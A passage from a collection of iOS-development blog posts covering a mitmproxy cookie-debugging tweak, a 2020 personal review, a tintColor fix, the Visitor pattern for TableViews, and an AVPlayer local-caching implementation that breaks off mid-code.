        # setCookies = ['ad=0; Domain=.xxx.com; expires=Wed, 23 Aug 2023 04:59:07 GMT; Max-Age=1800; Path=/', 'sessionid=xxxx; Secure; HttpOnly; Domain=.xxx.com; expires=Wed, 23 Aug 2023 04:59:07 GMT; Max-Age=1800; Path=/']

        # OR Replace Cookie Domain From .xxx.com To 127.0.0.1
        setCookies = [re.sub(r"\s*\.xxx\.com\s*", "127.0.0.1", s) for s in setCookies]

        # AND Remove Security-Related Restrictions
        setCookies = [re.sub(r";\s*Secure\s*", "", s) for s in setCookies]
        setCookies = [re.sub(r";\s*HttpOnly;\s*", "", s) for s in setCookies]

        flow.response.headers.set_all("Set-Cookie", setCookies)

    #...
If you encounter issues with Cookies, such as the API responding with a Cookie but the App not receiving it, you can refer to the adjustments above.
During my 900+ days at Pinkoi, I realized many of my career aspirations and imaginations regarding iOS/App development and processes. I am grateful to all my teammates for walking through the pandemic and weathering the storms together; the courage to say goodbye is akin to the courage to pursue dreams and join the company initially.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
A very late review of 2020
Unrelated to work, 2020 was a difficult year for me; I went through many major setbacks, but fortunately, I got through them.
I just want to say one thing:
People should learn to cherish the present and appreciate what they have.
Back to work, in 2020 I stepped out of my comfort zone and entered a new environment; this exposed me to many new things and I absorbed a lot of essential knowledge in iOS and engineering development. Although the number of articles I produced in 2020 was not as high as before, and I even stopped updating for three to four months, the quality over quantity approach paid off. The articles I wrote in 2020, though fewer, performed better than before; I am gradually making progress!
Additionally, last year I also set up my personal website using Google Sites and will continue to sync new Medium articles there.
I am still the same person; I am very lazy. I don’t write articles just for the sake of writing. Each article is a process of recording insights that I have brewed over time. If I get lazy and don’t do it in one go, I probably won’t go back to write it (but this mostly happens with unimportant or uninteresting topics).
The downside is that sometimes I get too enthusiastic and write too quickly. Typos are minor, but if the content is incorrect or incomplete and misleads people, it’s a real sin Orz. So this year, when writing articles, I will research and address any issues I can think of, even if I didn’t use them in my initial project. If I can’t address them, I will leave a note to remind readers to pay attention to that aspect.
After installing, click “+” on Medium and then select the last option “<>”
The screen will split into two, and you can enter the code directly on the right:
After submitting, it will be embedded in the Medium article as a gist:
The advantage of embedding code with gist is that it supports syntax highlighting, making it easier for readers to read. The downside is that if you want to convert Medium to markdown format, the embedded code cannot be automatically converted and you have to manually Copy & Paste.
- Tried many conversion tools but none support gist extraction. If anyone knows, please share.
- Medium’s built-in code block still doesn’t support syntax highlighting, so this is the only way.
Daily traffic aggregation display, allowing you to see today’s traffic composition at a glance.
Additionally, it includes features for tracking new followers, claps, and more.
Besides continuing to write; I plan to find time to convert each article into Markdown format and upload them to Github for backup, in case Medium suddenly crashes one day… Currently, I am using Typora as the editor; it’s quite handy, and I’ll introduce it later!
The current progress is about 15% complete, because it’s quite boring, so I’m a bit lazy, haha.
Medium’s official backup download only backs up plain text, images are still linked externally and not downloaded; moreover, the code parts are embedded and cannot be directly displayed in Markdown.
It has already been deployed, please refer to "Medium Custom Domain Feature Returns". (Using blog.zhgchg.li because the main domain has other uses.) However, I found that it affects Google SEO, so I'm still considering & testing whether to really use it.
Recently, I also activated the following services:
Anyway, I’m Idle
Finally, let’s have some statistics!
In 2020, a total of: 16 articles were published: 3 lifestyle + 2 unboxing + 11 technical articles
Thanks for everyone’s support and love in 2020, I will continue to work hard this year!
Your feedback is my motivation to write!
ZhgChgLi, 2021/02/24.
If you have any questions or comments, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Issue with the .tintColor setting of this page's Image Assets (Render As Template) failing when presenting UIAlertController
No lengthy explanations, let’s go straight to the comparison images.
Left Before Fix/Right After Fix
You can see that the ICON on the left loses its tintColor setting when UIAlertController is presented. Additionally, the color setting returns to normal once the presented window is closed.
First, let's introduce the tintAdjustmentMode property. This property controls the display mode of tintColor and has three enumeration settings: automatic, normal, and dimmed.
When presenting UIAlertController, it changes the tintAdjustmentMode of the Root ViewController’s view to Dimmed (so technically, the color setting doesn’t “fail”; it’s just that the tintAdjustmentMode mode changes).
But sometimes we want the ICON color to remain consistent, so we just need to keep the tintAdjustmentMode setting consistent in the UIView’s tintColorDidChange event:
extension UIButton {
    override func tintColorDidChange() {
        self.tintAdjustmentMode = .normal // Always keep normal
    }
}
extension example
It’s not a big issue, and it’s fine if you don’t change it, but it can be an eyesore.
Actually, every page that encounters presenting UIAlertController, action sheet, popover, etc., will change the view’s tintAdjustmentMode to gray, but I only noticed it on this page.
After searching for a while, I found out it was related to this property. Setting it resolved my small confusion.
If you have any questions or feedback, feel free to contact me.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
Enhancing the readability and extensibility of TableView using the Visitor Pattern
Photo by Alex wong
Following the previous article on “Visitor Pattern in Swift” introducing the Visitor pattern and a simple practical application scenario, this article will discuss another practical application in iOS development.
Developing a dynamic wall feature where various types of blocks need to be dynamically combined and displayed.
Taking StreetVoice’s dynamic wall as an example:
As shown in the image above, the dynamic wall is composed of various types of blocks dynamically combined, including:
More types are expected to be added as the feature continues to iterate.
Without any architectural design, the code may look like this:
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
    let row = datas[indexPath.row]
    switch row.type {
    case .invitation:
        let cell = tableView.dequeueReusableCell(withIdentifier: "invitation", for: indexPath) as! InvitationCell
        // config cell with viewObject/viewModel...
        return cell
    case .newSong:
        let cell = tableView.dequeueReusableCell(withIdentifier: "newSong", for: indexPath) as! NewSongCell
        // config cell with viewObject/viewModel...
        return cell
    case .newEvent:
        let cell = tableView.dequeueReusableCell(withIdentifier: "newEvent", for: indexPath) as! NewEventCell
        // config cell with viewObject/viewModel...
        return cell
    case .newText:
        let cell = tableView.dequeueReusableCell(withIdentifier: "newText", for: indexPath) as! NewTextCell
        // config cell with viewObject/viewModel...
        return cell
    case .newPhotos:
        let cell = tableView.dequeueReusableCell(withIdentifier: "newPhotos", for: indexPath) as! NewPhotosCell
        // config cell with viewObject/viewModel...
        return cell
    }
}

func tableView(_ tableView: UITableView, heightForRowAt indexPath: IndexPath) -> CGFloat {
    let row = datas[indexPath.row]
    switch row.type {
    case .invitation:
        if row.isEmpty {
            return 100
        } else {
            return 300
        }
    case .newSong:
        return 100
    case .newEvent:
        return 200
    case .newText:
        return UITableView.automaticDimension
    case .newPhotos:
        return UITableView.automaticDimension
    }
}
Organized the object relationships as shown in the figure below:
We have many types of DataSource (ViewObject) that need to interact with multiple types of operators, which is a very typical Visitor Double Dispatch.
To simplify the Demo Code, we will use PlainTextFeedViewObject
for plain text feed, MemoriesFeedViewObject
for daily memories, and MediaFeedViewObject
for image feed to demonstrate the design.
protocol FeedVisitor {
    associatedtype T
    func visit(_ viewObject: PlainTextFeedViewObject) -> T?
    func visit(_ viewObject: MediaFeedViewObject) -> T?
    func visit(_ viewObject: MemoriesFeedViewObject) -> T?
    //...
}
Implement the FeedVisitor
interface for each operator:
struct FeedCellVisitor: FeedVisitor {
    typealias T = UITableViewCell.Type

    func visit(_ viewObject: MediaFeedViewObject) -> T? {
        return MediaFeedTableViewCell.self
    }

    func visit(_ viewObject: MemoriesFeedViewObject) -> T? {
        return MemoriesFeedTableViewCell.self
    }

    func visit(_ viewObject: PlainTextFeedViewObject) -> T? {
        return PlainTextFeedTableViewCell.self
    }
}
Implement the mapping between ViewObject <-> UITableViewCell.
struct FeedCellHeightVisitor: FeedVisitor {
    typealias T = CGFloat

    func visit(_ viewObject: MediaFeedViewObject) -> T? {
        return 30
    }

    func visit(_ viewObject: MemoriesFeedViewObject) -> T? {
        return 10
    }

    func visit(_ viewObject: PlainTextFeedViewObject) -> T? {
        return 10
    }
}
Implement the mapping between ViewObject <-> UITableViewCell Height.
struct FeedCellConfiguratorVisitor: FeedVisitor {

    private let cell: UITableViewCell

    init(cell: UITableViewCell) {
        self.cell = cell
    }

    func visit(_ viewObject: MediaFeedViewObject) -> Any? {
        guard let cell = cell as? MediaFeedTableViewCell else { return nil }
        // cell.config(viewObject)
        return nil
    }

    func visit(_ viewObject: MemoriesFeedViewObject) -> Any? {
        guard let cell = cell as? MemoriesFeedTableViewCell else { return nil }
        // cell.config(viewObject)
        return nil
    }

    func visit(_ viewObject: PlainTextFeedViewObject) -> Any? {
        guard let cell = cell as? PlainTextFeedTableViewCell else { return nil }
        // cell.config(viewObject)
        return nil
    }
}
Implements the mapping of how each ViewObject configures its corresponding Cell.
When you need to support a new DataSource (ViewObject), just add a new method in the FeedVisitor interface, and implement the corresponding logic in each operator.
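For example, to support a hypothetical NewEventFeedViewObject rendered by a hypothetical NewEventFeedTableViewCell, the changes are limited to one new visit requirement plus its implementations (a sketch only; its accept implementation follows the FeedViewObject binding shown below):
// 1. Add one requirement to the existing FeedVisitor protocol:
//    func visit(_ viewObject: NewEventFeedViewObject) -> T?

// 2. Each concrete visitor supplies its own mapping for the new type,
//    e.g. ViewObject -> Cell class in FeedCellVisitor:
extension FeedCellVisitor {
    func visit(_ viewObject: NewEventFeedViewObject) -> UITableViewCell.Type? {
        return NewEventFeedTableViewCell.self
    }
}

// 3. The new ViewObject simply dispatches itself to whatever visitor it is given:
struct NewEventFeedViewObject: FeedViewObject {
    func accept<V>(visitor: V) -> V.T? where V: FeedVisitor {
        return visitor.visit(self)
    }
}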
DataSource (ViewObject) binding with operators:
protocol FeedViewObject {
    @discardableResult func accept<V: FeedVisitor>(visitor: V) -> V.T?
}
struct PlainTextFeedViewObject: FeedViewObject {
    func accept<V>(visitor: V) -> V.T? where V : FeedVisitor {
        return visitor.visit(self)
    }
}
struct MemoriesFeedViewObject: FeedViewObject {
    func accept<V>(visitor: V) -> V.T? where V : FeedVisitor {
        return visitor.visit(self)
    }
}
final class ViewController: UIViewController {
+
+ @IBOutlet weak var tableView: UITableView!
+
+ private let cellVisitor = FeedCellVisitor()
+
+ private var viewObjects: [FeedViewObject] = [] {
+ didSet {
+ viewObjects.forEach { viewObject in
+ let cellName = viewObject.accept(visitor: cellVisitor)
+ tableView.register(cellName, forCellReuseIdentifier: String(describing: cellName))
+ }
+ }
+ }
+
+ override func viewDidLoad() {
+ super.viewDidLoad()
+
+ tableView.delegate = self
+ tableView.dataSource = self
+
+ viewObjects = [
+ MemoriesFeedViewObject(),
+ MediaFeedViewObject(),
+ PlainTextFeedViewObject(),
+ MediaFeedViewObject(),
+ PlainTextFeedViewObject(),
+ MediaFeedViewObject(),
+ PlainTextFeedViewObject()
+ ]
+ // Do any additional setup after loading the view.
+ }
+}
+
+extension ViewController: UITableViewDataSource {
+ func numberOfSections(in tableView: UITableView) -> Int {
+ return 1
+ }
+
+ func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
+ return viewObjects.count
+ }
+
+ func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
+ let viewObject = viewObjects[indexPath.row]
+ let cellName = viewObject.accept(visitor: cellVisitor)
+
+ let cell = tableView.dequeueReusableCell(withIdentifier: String(describing: cellName), for: indexPath)
+ let cellConfiguratorVisitor = FeedCellConfiguratorVisitor(cell: cell)
+ viewObject.accept(visitor: cellConfiguratorVisitor)
+ return cell
+ }
+}
+
+extension ViewController: UITableViewDelegate {
+ func tableView(_ tableView: UITableView, heightForRowAt indexPath: IndexPath) -> CGFloat {
+ let viewObject = viewObjects[indexPath.row]
+ let cellHeightVisitor = FeedCellHeightVisitor()
+ let cellHeight = viewObject.accept(visitor: cellHeightVisitor) ?? UITableView.automaticDimension
+ return cellHeight
+ }
+}
+
This article was written during a low period in July 2022. If there are any inadequacies or errors in the content, please forgive me!
Feel free to contact me for any questions or feedback.
===
===
This article was first published in Traditional Chinese on Medium ➡️ View Here
AVPlayer/AVQueuePlayer with AVURLAsset implementing AVAssetResourceLoaderDelegate
Photo by Tyler Lastovich
I have open-sourced my previous implementation, and those in need can use it directly.
It’s been more than half a year since the last post “Exploring Methods for Implementing iOS HLS Cache”, and the team has always wanted to implement the cache-while-playing feature because it greatly impacts costs. We are a music streaming platform, and if we have to fetch the entire file every time the same song is played, it would be a huge data drain for us and for users who don’t have unlimited data plans. Although music files are at most a few MB, it all adds up to significant costs!
Additionally, since the Android side has already implemented the cache-while-playing feature, we previously compared the costs and found that after launching on Android, there was a significant reduction in data usage. With relatively more users on iOS, we should see even better data savings.
Based on the experience from the previous post, if we continue to use HLS (.m3u8/.ts) to achieve our goal, things will become very complicated and possibly unachievable. So, we decided to revert to using mp3 files, which allows us to directly use AVAssetResourceLoaderDelegate
for implementation.
First, we need to understand how data is requested from the server when playing videos or music. Generally, video and music files are very large, and it is not feasible to wait until the entire file is fetched before starting playback. The common approach is to fetch data as it plays, only needing the data for the currently playing segment.
The way to achieve this is through HTTP/1.1 Range, which only returns the specified byte range of data, for example, specifying 0–100 will only return the 100 bytes of data from 0–100. Using this method, data can be fetched in segments and then assembled into a complete file. This method can also be applied to resume interrupted downloads.
We will first use HEAD to check the Response Header to understand if the server supports Range requests, the total length of the resource, and the file type:
curl -i -X HEAD http://zhgchg.li/music.mp3
Using HEAD, we can get the following information from the Response Header:
However, sometimes we also use GET Range: bytes=0–1
, which means we request data in the range of 0–1, but we don’t actually care about the content of 0–1. We just want to see the Response Header information; the native AVPlayer uses GET to check, so this article will also use it.
However, using HEAD to check is more recommended. For one, it is more semantically correct, and if the server does not support the Range function, a GET would force the entire file to be downloaded.
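As an app-side sketch of the HEAD check (equivalent to the curl command above; error handling omitted):
import Foundation

var headRequest = URLRequest(url: URL(string: "http://zhgchg.li/music.mp3")!)
headRequest.httpMethod = "HEAD" // Only fetch headers, no body is downloaded.

URLSession.shared.dataTask(with: headRequest) { _, response, _ in
    guard let httpResponse = response as? HTTPURLResponse else { return }
    let acceptRanges = httpResponse.value(forHTTPHeaderField: "Accept-Ranges") // "bytes" if Range is supported (iOS 13+ API)
    let totalLength = httpResponse.expectedContentLength                       // total length of the resource
    let mimeType = httpResponse.mimeType                                       // e.g. "audio/mpeg"
    print(acceptRanges ?? "-", totalLength, mimeType ?? "-")
}.resume()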
curl -i -X GET http://zhgchg.li/music.mp3 -H "Range: bytes=0-1"
Using GET, we can get the following information from the Response Header:
Knowing that the server supports Range requests, we can initiate segmented Range requests:
curl -i -X GET http://zhgchg.li/music.mp3 -H "Range: bytes=0-100"
The server will return 206 Partial Content:
Content-Range: bytes 0-100/total length
Content-Length: 100
...
(binary content)
At this point, we get the data for Range 0–100 and can continue to make new requests for Range 100–200, 200–300, and so on until the end.
If the requested Range exceeds the total length of the resource, it will return 416 Range Not Satisfiable.
Additionally, to get the complete file data, you can request Range 0-total length or use 0-:
curl -i -X GET http://zhgchg.li/music.mp3 -H "Range: bytes=0-"
You can also request multiple Range data in the same request and set conditions, but we don’t need that. For more details, you can refer here.
Keep-Alive is enabled by default in HTTP/1.1. This feature allows downloaded data to be read as it arrives; for example, a 5 MB file can be received in 16 KB, 16 KB, 16 KB… increments, without waiting for the entire 5 MB to be downloaded.
Connection: Keep-Alive
If the server does not support the features above, then there is no need to do all of this: just use URLSession to download the entire mp3 file and feed it to the player… But this is not the result we want, so you can ask the backend to adjust the server settings.
When we use AVURLAsset to initialize with a URL resource and assign it to AVPlayer/AVQueuePlayer to start playing, as mentioned above, it will first use GET Range 0–1 to obtain whether it supports Range requests, the total length of the resource, and the file type.
With the file information, a second request will be initiated to request data from 0 to the total length.
⚠️ AVPlayer will request data from 0 to the total length and will cancel the network request once it feels it has enough data (e.g., 16 kb, 16 kb, 16 kb…) (so it won’t actually fetch the entire file unless the file is very small).
It will continue to request data using Range after resuming playback.
(This part is different from what I previously thought; I assumed it would request 0–100, 100–200, etc.)
AVPlayer Request Example:
1. GET Range 0-1 => Response: Total length 150000 / public.mp3 / true
2. GET 0-150000...
3. 16 kb receive
4. 16 kb receive...
5. cancel() // current offset is 700
6. Continue playback
7. GET 700-150000...
8. 16 kb receive
9. 16 kb receive...
10. cancel() // current offset is 1500
11. Continue playback
12. GET 1500-150000...
13. 16 kb receive
14. 16 kb receive...
16. If seek to...5000
17. cancel(12.) // current offset is 2000
18. GET 5000-150000...
19. 16 kb receive
20. 16 kb receive...
...
⚠️ In iOS ≤12, it will first send a few shorter requests to test (?), and then send a request for the total length; in iOS ≥ 13, it will directly send a request for the total length.
Another side issue is that while observing how resources are fetched, I used the mitmproxy tool for sniffing. It showed errors, waiting for the entire response to come back before displaying it, instead of showing segments and using persistent connections for continued downloads. This scared me! I thought iOS was dumb enough to fetch the entire file each time! Next time, I need to be a bit skeptical when using tools Orz.
⚠️ Switching to the next resource in AVQueuePlayer or changing the playback resource in AVPlayer will not initiate a Cancel request for the previous track.
It also calls the Resource Loader to handle it, but the requested data range will be smaller.
With the above preliminary knowledge, let’s look at how to implement the local cache function of AVPlayer.
As mentioned earlier, AVAssetResourceLoaderDelegate
allows us to implement the Resource Loader for the Asset.
The Resource Loader is essentially a worker. Whether the player needs file information or file data, and the range, it tells us, and we do it.
I saw an example where a Resource Loader serves all AVURLAssets, which I think is wrong. It should be one Resource Loader serving one AVURLAsset, following the lifecycle of the AVURLAsset, as it belongs to the AVURLAsset.
A Resource Loader serving all AVURLAssets in AVQueuePlayer would become very complex and difficult to manage.
Note that implementing your own Resource Loader doesn’t mean it will handle everything. It will only use your Resource Loader when the system cannot recognize or handle the resource.
Therefore, before giving the URL resource to AVURLAsset, we need to change the Scheme to our custom Scheme, not http/https… which the system can handle.
http://zhgchg.li/music.mp3 => cacheable://zhgchg.li/music.mp3
AVAssetResourceLoaderDelegate: only two methods need to be implemented.
This method asks us if we can handle this resource. Return true if we can, return false if we cannot (unsupported URL).
We can extract what is being requested from loadingRequest
(whether it is the first request for file information or a data request, and if it is a data request, what the Range is). After knowing the request, we initiate our own request to fetch the data. Here we can decide whether to initiate a URLSession or return Data from local storage.
Additionally, we can perform Data encryption and decryption operations here to protect the original data.
The other method is called when the player cancels a request; as mentioned in the preliminary knowledge about when Cancel is initiated, we can cancel the ongoing URLSession request here.
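A minimal skeleton of these two delegate methods, using a hypothetical MyResourceLoader class just to show where each piece of work happens (the full implementation comes later in this article):
import AVFoundation

final class MyResourceLoader: NSObject, AVAssetResourceLoaderDelegate {
    func resourceLoader(_ resourceLoader: AVAssetResourceLoader,
                        shouldWaitForLoadingOfRequestedResource loadingRequest: AVAssetResourceLoadingRequest) -> Bool {
        if loadingRequest.contentInformationRequest != nil {
            // First request: the player wants file information
            // (content type, total length, whether Range access is supported).
        } else if let dataRequest = loadingRequest.dataRequest {
            // Data request: the player wants a specific byte range.
            let offset = dataRequest.requestedOffset   // where to start
            let length = dataRequest.requestedLength   // how many bytes
            _ = (offset, length)
            // -> respond from local cache, or start a URLSession Range request here.
        }
        return true // true = we will handle (and later finish) this loadingRequest.
    }

    func resourceLoader(_ resourceLoader: AVAssetResourceLoader,
                        didCancel loadingRequest: AVAssetResourceLoadingRequest) {
        // The player no longer needs this request; cancel the in-flight URLSession task here.
    }
}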
For the Cache part, I directly use PINCache, delegating the Cache work to it, avoiding issues like Cache read/write DeadLock and implementing Cache LRU strategy.
️️⚠️️️️️️️️️️️OOM Warning!
Since this is for caching music files with a size of around 10 MB, PINCache can be used as a local Cache tool. However, this method cannot be used for serving videos (which may require loading several GB of data into memory at once).
For such requirements, you can refer to the approach of using FileHandle’s seek read/write features.
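A rough sketch of that FileHandle idea, reading only the requested range from a cached file on disk instead of loading the whole file into memory (hypothetical helper, iOS 13+ APIs, error handling simplified):
import Foundation

// Read `length` bytes starting at `offset` from a cached media file.
func readCachedData(fileURL: URL, offset: UInt64, length: Int) throws -> Data {
    let fileHandle = try FileHandle(forReadingFrom: fileURL)
    defer { try? fileHandle.close() }
    try fileHandle.seek(toOffset: offset)        // jump to the requested position
    return fileHandle.readData(ofLength: length) // read only the requested amount
}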
Without further ado, here is the complete project:
Local Cache data object mapping implements NSCoding, as PINCache relies on the archivedData method for encoding/decoding.
import Foundation
import CryptoKit

class AssetDataContentInformation: NSObject, NSCoding {
    @objc var contentLength: Int64 = 0
    @objc var contentType: String = ""
    @objc var isByteRangeAccessSupported: Bool = false

    func encode(with coder: NSCoder) {
        coder.encode(self.contentLength, forKey: #keyPath(AssetDataContentInformation.contentLength))
        coder.encode(self.contentType, forKey: #keyPath(AssetDataContentInformation.contentType))
        coder.encode(self.isByteRangeAccessSupported, forKey: #keyPath(AssetDataContentInformation.isByteRangeAccessSupported))
    }

    override init() {
        super.init()
    }

    required init?(coder: NSCoder) {
        super.init()
        self.contentLength = coder.decodeInt64(forKey: #keyPath(AssetDataContentInformation.contentLength))
        self.contentType = coder.decodeObject(forKey: #keyPath(AssetDataContentInformation.contentType)) as? String ?? ""
        self.isByteRangeAccessSupported = coder.decodeObject(forKey: #keyPath(AssetDataContentInformation.isByteRangeAccessSupported)) as? Bool ?? false
    }
}

class AssetData: NSObject, NSCoding {
    @objc var contentInformation: AssetDataContentInformation = AssetDataContentInformation()
    @objc var mediaData: Data = Data()

    override init() {
        super.init()
    }

    func encode(with coder: NSCoder) {
        coder.encode(self.contentInformation, forKey: #keyPath(AssetData.contentInformation))
        coder.encode(self.mediaData, forKey: #keyPath(AssetData.mediaData))
    }

    required init?(coder: NSCoder) {
        super.init()
        self.contentInformation = coder.decodeObject(forKey: #keyPath(AssetData.contentInformation)) as? AssetDataContentInformation ?? AssetDataContentInformation()
        self.mediaData = coder.decodeObject(forKey: #keyPath(AssetData.mediaData)) as? Data ?? Data()
    }
}
AssetData contains:
- contentInformation: AssetDataContentInformation
- AssetDataContentInformation: contains whether Range requests are supported (isByteRangeAccessSupported), the total resource length (contentLength), and the file type (contentType)
- mediaData: the original audio Data (large files here may cause OOM)

The following encapsulates the logic for storing and retrieving Data in PINCache.
import PINCache
import Foundation

protocol AssetDataManager: NSObject {
    func retrieveAssetData() -> AssetData?
    func saveContentInformation(_ contentInformation: AssetDataContentInformation)
    func saveDownloadedData(_ data: Data, offset: Int)
    func mergeDownloadedDataIfIsContinuted(from: Data, with: Data, offset: Int) -> Data?
}

extension AssetDataManager {
    func mergeDownloadedDataIfIsContinuted(from: Data, with: Data, offset: Int) -> Data? {
        if offset <= from.count && (offset + with.count) > from.count {
            let start = from.count - offset
            var data = from
            data.append(with.subdata(in: start..<with.count))
            return data
        }
        return nil
    }
}

//

class PINCacheAssetDataManager: NSObject, AssetDataManager {

    static let Cache: PINCache = PINCache(name: "ResourceLoader")
    let cacheKey: String

    init(cacheKey: String) {
        self.cacheKey = cacheKey
        super.init()
    }

    func saveContentInformation(_ contentInformation: AssetDataContentInformation) {
        let assetData = AssetData()
        assetData.contentInformation = contentInformation
        PINCacheAssetDataManager.Cache.setObjectAsync(assetData, forKey: cacheKey, completion: nil)
    }

    func saveDownloadedData(_ data: Data, offset: Int) {
        guard let assetData = self.retrieveAssetData() else {
            return
        }

        if let mediaData = self.mergeDownloadedDataIfIsContinuted(from: assetData.mediaData, with: data, offset: offset) {
            assetData.mediaData = mediaData

            PINCacheAssetDataManager.Cache.setObjectAsync(assetData, forKey: cacheKey, completion: nil)
        }
    }

    func retrieveAssetData() -> AssetData? {
        guard let assetData = PINCacheAssetDataManager.Cache.object(forKey: cacheKey) as? AssetData else {
            return nil
        }
        return assetData
    }
}
Here, we extract the Protocol because we might use other storage methods to replace PINCache in the future. Therefore, other programs should rely on the Protocol rather than the Class instance when using it.
⚠️ mergeDownloadedDataIfIsContinuted: this method is extremely important.
For linear playback, you just need to keep appending new Data to the Cache Data, but the real situation is much more complicated. The user might play Range 0~100 and then directly Seek to Range 200–500 for playback. How to merge the existing 0-100 Data with the new 200–500 Data is a big problem.
⚠️ Data merging issues can lead to terrible playback glitches…
The answer here is, we do not handle non-continuous data; because our project is only for audio, and the files are just a few MB (≤ 10MB), considering the development cost, we didn’t do it. I only handle merging continuous data (for example, currently having 0~100, and the new data is 75~200, after merging it becomes 0~200; if the new data is 150~200, I will ignore it and not merge).
If you want to consider non-continuous merging, besides using other methods for storage (to identify the missing parts), you also need to be able to query which segment needs a network request and which segment is taken locally during the Request. Considering this situation, the implementation will be very complicated.
Image source: iOS AVPlayer Video Cache Design and Implementation
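To make the continuous-merge rule concrete, here is a small illustration using the mergeDownloadedDataIfIsContinuted default implementation above (the byte counts are arbitrary):
let manager = PINCacheAssetDataManager(cacheKey: "music.mp3")

let cached = Data(count: 100)       // already cached: bytes 0~99
let overlapping = Data(count: 125)  // newly downloaded: bytes 75~199 (offset 75)
let disjoint = Data(count: 50)      // newly downloaded: bytes 150~199 (offset 150)

// Continuous/overlapping data is merged: the result covers bytes 0~199 (200 bytes).
let merged = manager.mergeDownloadedDataIfIsContinuted(from: cached, with: overlapping, offset: 75)
print(merged?.count ?? 0) // 200

// Non-continuous data is ignored, because bytes 100~149 would be missing.
let ignored = manager.mergeDownloadedDataIfIsContinuted(from: cached, with: disjoint, offset: 150)
print(ignored == nil) // true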
AVURLAsset weakly holds the ResourceLoader Delegate, so it is recommended to create an AVURLAsset Class that inherits from AVURLAsset, internally create, assign, and hold the ResourceLoader, allowing it to follow the lifecycle of AVURLAsset. Additionally, you can store information such as the original URL, CacheKey, etc.
class CachingAVURLAsset: AVURLAsset {
    static let customScheme = "cacheable"
    let originalURL: URL
    private var _resourceLoader: ResourceLoader?

    var cacheKey: String {
        return self.url.lastPathComponent
    }

    static func isSchemeSupport(_ url: URL) -> Bool {
        guard let components = URLComponents(url: url, resolvingAgainstBaseURL: false) else {
            return false
        }

        return ["http", "https"].contains(components.scheme)
    }

    override init(url URL: URL, options: [String: Any]? = nil) {
        self.originalURL = URL

        guard var components = URLComponents(url: URL, resolvingAgainstBaseURL: false) else {
            super.init(url: URL, options: options)
            return
        }

        components.scheme = CachingAVURLAsset.customScheme
        guard let url = components.url else {
            super.init(url: URL, options: options)
            return
        }

        super.init(url: url, options: options)

        let resourceLoader = ResourceLoader(asset: self)
        self.resourceLoader.setDelegate(resourceLoader, queue: resourceLoader.loaderQueue)
        self._resourceLoader = resourceLoader
    }
}
Usage:
if CachingAVURLAsset.isSchemeSupport(url) {
    let asset = CachingAVURLAsset(url: url)
    let playerItem = AVPlayerItem(asset: asset)
    let avplayer = AVPlayer(playerItem: playerItem)
    avplayer.play()
}
Where isSchemeSupport() is used to determine whether the URL supports our Resource Loader (excluding file://).
originalURL stores the original resource URL.
cacheKey stores the Cache Key for this resource; here we directly use the file name as the Cache Key.
Please adjust cacheKey according to real-world scenarios. If the file name is not hashed and may be duplicated, it is recommended to hash it first to avoid collisions; if you want to hash the entire URL as the key, also pay attention to whether the URL will change (e.g., when using a CDN).
Hashing can use md5…sha…; on iOS ≥ 13 you can directly use Apple's CryptoKit, for others, check GitHub!
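For example, with CryptoKit (iOS ≥ 13), hashing the full URL into a stable cache key could be sketched as:
import CryptoKit
import Foundation

func cacheKey(for url: URL) -> String {
    let digest = SHA256.hash(data: Data(url.absoluteString.utf8))
    // Hex-encode the digest so it can safely be used as a cache key.
    return digest.map { String(format: "%02x", $0) }.joined()
}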
import Foundation
+import CoreServices
+
+protocol ResourceLoaderRequestDelegate: AnyObject {
+ func dataRequestDidReceive(_ resourceLoaderRequest: ResourceLoaderRequest, _ data: Data)
+ func dataRequestDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ error: Error?, _ downloadedData: Data)
+ func contentInformationDidComplete(_ resourceLoaderRequest: ResourceLoaderRequest, _ result: Result<AssetDataContentInformation, Error>)
+}
+
+class ResourceLoaderRequest: NSObject, URLSessionDataDelegate {
+ struct RequestRange {
+ var start: Int64
+ var end: RequestRangeEnd
+
+ enum RequestRangeEnd {
+ case requestTo(Int64)
+ case requestToEnd
+ }
+ }
+
+ enum RequestType {
+ case contentInformation
+ case dataRequest
+ }
+
+ struct ResponseUnExpectedError: Error { }
+
+ private let loaderQueue: DispatchQueue
+
+ let originalURL: URL
+ let type: RequestType
+
+ private var session: URLSession?
+ private var dataTask: URLSessionDataTask?
+ private var assetDataManager: AssetDataManager?
+
+ private(set) var requestRange: RequestRange?
+ private(set) var response: URLResponse?
+ private(set) var downloadedData: Data = Data()
+
+ private(set) var isCancelled: Bool = false {
+ didSet {
+ if isCancelled {
+ self.dataTask?.cancel()
+ self.session?.invalidateAndCancel()
+ }
+ }
+ }
+ private(set) var isFinished: Bool = false {
+ didSet {
+ if isFinished {
+ self.session?.finishTasksAndInvalidate()
+ }
+ }
+ }
+
+ weak var delegate: ResourceLoaderRequestDelegate?
+
+ init(originalURL: URL, type: RequestType, loaderQueue: DispatchQueue, assetDataManager: AssetDataManager?) {
+ self.originalURL = originalURL
+ self.type = type
+ self.loaderQueue = loaderQueue
+ self.assetDataManager = assetDataManager
+ super.init()
+ }
+
+ func start(requestRange: RequestRange) {
+ guard isCancelled == false, isFinished == false else {
+ return
+ }
+
+ self.loaderQueue.async { [weak self] in
+ guard let self = self else {
+ return
+ }
+
+ var request = URLRequest(url: self.originalURL)
+ self.requestRange = requestRange
+ let start = String(requestRange.start)
+ let end: String
+ switch requestRange.end {
+ case .requestTo(let rangeEnd):
+ end = String(rangeEnd)
+ case .requestToEnd:
+ end = ""
+ }
+
+ let rangeHeader = "bytes=\(start)-\(end)"
+ request.setValue(rangeHeader, forHTTPHeaderField: "Range")
+
+ let session = URLSession(configuration: .default, delegate: self, delegateQueue: nil)
+ self.session = session
+ let dataTask = session.dataTask(with: request)
+ self.dataTask = dataTask
+ dataTask.resume()
+ }
+ }
+
+ func cancel() {
+ self.isCancelled = true
+ }
+
+ func urlSession(_ session: URLSession, dataTask: URLSessionDataTask, didReceive data: Data) {
+ guard self.type == .dataRequest else {
+ return
+ }
+
+ self.loaderQueue.async {
+ self.delegate?.dataRequestDidReceive(self, data)
+ self.downloadedData.append(data)
+ }
+ }
+
